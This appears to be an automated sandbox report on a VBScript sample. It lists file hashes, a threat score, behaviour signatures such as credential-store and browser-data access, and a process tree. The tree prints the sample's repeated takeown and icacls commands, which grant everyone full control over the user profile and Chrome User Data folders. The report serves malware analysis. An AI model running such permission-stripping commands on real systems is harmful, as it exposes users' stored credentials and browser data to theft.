Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
01-10-2024 16:42
General
-
Target
script.vbs
-
Size
784B
-
MD5
6c620f860d8abeaa47f87a16cf10329d
-
SHA1
eeb959357c4faac19f13c6fe3b11c80a90a5572a
-
SHA256
a021d90ce67e2b7377f7cd6bdd4f2bfa24c9df1977e63c17f305855c28643946
-
SHA512
2007c008c40ec23e21945bcc59d1c5ccd24800eef62e9e5327d324d9554d8478162bb74023d848092b4c6d0533c862d3f9c69f6e77bb1dbb8605e28e3e44c692
Score
8/10
Malware Config
Signatures
-
Possible privilege escalation attempt 64 IoCs
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\ && icacls C:\Users\ /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin && icacls C:\Users\Admin /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData && icacls C:\Users\Admin\AppData /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local && icacls C:\Users\Admin\AppData\Local /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe && icacls C:\Users\Admin\AppData\Local\Adobe /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 /grant everyone:(f)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache && icacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Color && icacls C:\Users\Admin\AppData\Local\Adobe\Color /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Color3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Color /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Adobe\Color\Profiles && icacls C:\Users\Admin\AppData\Local\Adobe\Color\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Adobe\Color\Profiles3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Adobe\Color\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Application Data && icacls C:\Users\Admin\AppData\Local\Application Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Application Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google && icacls C:\Users\Admin\AppData\Local\Google /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Google /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Google\Chrome /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\eb2eb914-1e84-40e0-9d31-9c7446722e77 && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\eb2eb914-1e84-40e0-9d31-9c7446722e77 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\eb2eb914-1e84-40e0-9d31-9c7446722e773⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data3⤵
-
-
-
